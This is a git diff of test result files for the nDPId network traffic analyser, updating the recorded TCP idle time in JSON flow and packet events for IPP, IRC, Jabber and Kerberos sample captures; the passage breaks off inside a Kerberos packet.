+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1210953939430,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939430,"pkt":"ABJ5gGlgABtjmL82CABFAAA8ASxAAEAGEFEKCgoxCgoK+9gvAnfdKfPLAAAAAKACFtBpAQAAAgQFtAQCCAoAa\/LnAAAAAAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1210953939431,"pkt":"ABtjmL82ABJ5gGlgCABFAAA8VFQAAEAG\/SgKCgr7CgoKMQJ32C+1fm4B3SnzzKASFtBa+AAAAgQFtAEDAwABAQgKAFjtJwBr8uc="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1210953939431,"pkt":"ABJ5gGlgABtjmL82CABFAAA0AS1AAEAGEFgKCgoxCgoK+9gvAnfdKfPMtX5uAoAQAC6dXQAAAQEICgBr8ugAWO0n"} +00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":256,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1210953939430,"flow_last_seen":1210953939431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1210953939431,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1210953938217,"flow_last_seen":1210953938237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":931,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55341,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":234,"flow_first_seen":1210953938235,"flow_last_seen":1210953939433,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2896,"flow_tot_l4_payload_len":227991,"flow_avg_l4_payload_len":974,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55342,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1210953939430,"flow_last_seen":1210953939492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1210953939492,"l3_proto":"ip4","src_ip":"10.10.10.49","dst_ip":"10.10.10.251","src_port":55343,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"IPP.HTTP","breed":"Acceptable","category":"Web"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":279,"source":"ipp.pcap","alias":"nDPId-test","packets-captured":279,"packets-processed":277,"total-skipped-flows":0,"total-l4-data-len":230224,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1210953939492} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 279/277 diff --git a/test/results/irc.pcap.out b/test/results/irc.pcap.out index ef8a50f73..9e3fdf279 100644 --- a/test/results/irc.pcap.out +++ b/test/results/irc.pcap.out @@ -1,11 +1,11 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"irc.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1387554241634} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387554241634,"flow_last_seen":1387554241634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387554241634,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} -00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1387554241634,"flow_last_seen":1387554241634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1387554241634,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1387554241634,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241634,"pkt":"AAAMB6wBABNyxPHhCABFAAA8\/+BAAEAGJjUKtJz5JuVGFLNhH0BpMfDFAAAAAKACOQj\/0AAAAgQFtAQCCAq+wg8lAAAAAAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1387554241665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1387554241665,"pkt":"ABNyxPHhANAr0XYACABFAAA8AABAADIGNBYm5UYUCrSc+R9As2GRFS01aTHwxqASFqAOiAAAAgQFtAQCCAowSCUOvsIPJQEDAwY="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1387554241665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1387554241665,"pkt":"AAAMB6wBABNyxPHhCABFAAA0\/+FAAEAGJjwKtJz5JuVGFLNhH0BpMfDGkRUtNoAQAHNTYQAAAQEICr7CD0QwSCUO"} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} +00917{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","packets-captured":29,"packets-processed":29,"total-skipped-flows":0,"total-l4-data-len":7015,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387554256201} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 29/29 diff --git a/test/results/jabber.pcap.out b/test/results/jabber.pcap.out index 75dc6b8f7..48082957c 100644 --- a/test/results/jabber.pcap.out +++ b/test/results/jabber.pcap.out @@ -1,11 +1,11 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"jabber.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1504181789350} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-data-len":157,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1504181789418} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 13/13 diff --git a/test/results/kerberos-login.pcap.out b/test/results/kerberos-login.pcap.out index 4fe0df09d..b576bcc59 100644 --- a/test/results/kerberos-login.pcap.out +++ b/test/results/kerberos-login.pcap.out @@ -49,12 +49,12 @@ 00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":180000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946716140774,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1244,"pkt_l4_len":1210,"thread_ts_msec":946716140774,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATOSu8AAIARyCcKBQMBCgEMAgBYBEgEurmkbYIErjCCBKqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iKTAnoAMCAQKhIDAeGwRjaWZzGxZ2cGMtdzJrM2VudC5kZW55ZGMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx0aFmxok9g1Ue0357Hr75qdhqZfRht4OHreKB5u\/V5IirkcwENplNxxQmbw8+DFBp6kUxON4ouXLUpsGQja+UwQNswQ7cEXb3TTT7jYMm2q+XU9A8z+Cm+x45x6EPfupXNfUoIz5d+DBXqnAKwiMsohJZBYGmEm7Q+yhVWVar9k\/vQ4EHxPSmoKKOWOqMeWxjcfGizeQcfY\/7A7oBkliScCXMBosF3zWgVn6SZUxx2nLdkS4jVlNmS1jWY0CBy3hQgCl7KtJ88Rxj2JXMQ5Fa0ibQHlt+FeHBgOikUOCt7JR9KHGnKF+V9OwmxFHJrtiKrEW2Cv72q08\/TX55bwUm9jrgvLF+1YsovMtrgWOHLFsVcxNfbdawsk1MAGXI1K8WdNlNxj79Sa+effGMmTt32eF8\/oOYgeR3A+0F1wnFjIQeheNTRLl\/9WBWymTf5CVGZk9I\/sUh0ufZ1o58VaghVEb+aOBC6tWfpsOkLJ9ANhxY1Vw45ioZzS06CBZRvW7MMUcb4Ur7IeznoOXOKL+obkIkaEuJF9dxjVVEK3H8T8BFen6GrrRV4+9gxQ28wWj2B\/3R0I0K8npdyxugyU7o6q1h547H+5tjJ8dixUeIFR0R+BxQUA1qGlVkB7SS4zvQUHJeQ33GsZmfB09OjxsbZUKDOYPS2DppWChX3zAiJESMybgCQW5ulCO\/DCKGrcKFEaqcfqvdr1e4WyRdwCcvZn2MJR1nu01uw1EbqNmvBlDTHXDpZmQAS+Z9AFAEe6+Jwucjc+X3W9+cKSxj+uTpUbPMfAp3MPTCh88MxPw2Aax6SFtx5IK+P6jE2F6eQfjhX9aV6hdIZ0pWVxFUqJk1oXwgJHigW8nhTnJsDeLgqs70DVvtJOOt9wQIyuysdS5eh4ZJK2TyKfSg9XuEekXtqV8HHagG6OZO87HJsGQmu\/\/tjHaE7Ql4hIoe+fcxYBzuwcDJYmBr6xlBxFqKXZZHTBFk60GqPFITFaX17Oz+6fJYP3RmN2JGKt17gwAhua9IJr3+oyzOLK9Ar9ryp7P5t03iErc\/1gvMC+WI+39aaB\/TCB+qADAgEXooHyBIHv9+WbNZuFKxvCR6wr2zaCGnigV6GBLntoGkqEg4\/vMLz6p+qzEJQC2ilW82BTzXU6scdi61TaIC3oq6sMVee5Q+SNihDQg2j\/e7P09S+lWbe2hxhDb2MYsqe8Lg50XMclkXvYxZYVxgGfh9+QhSOk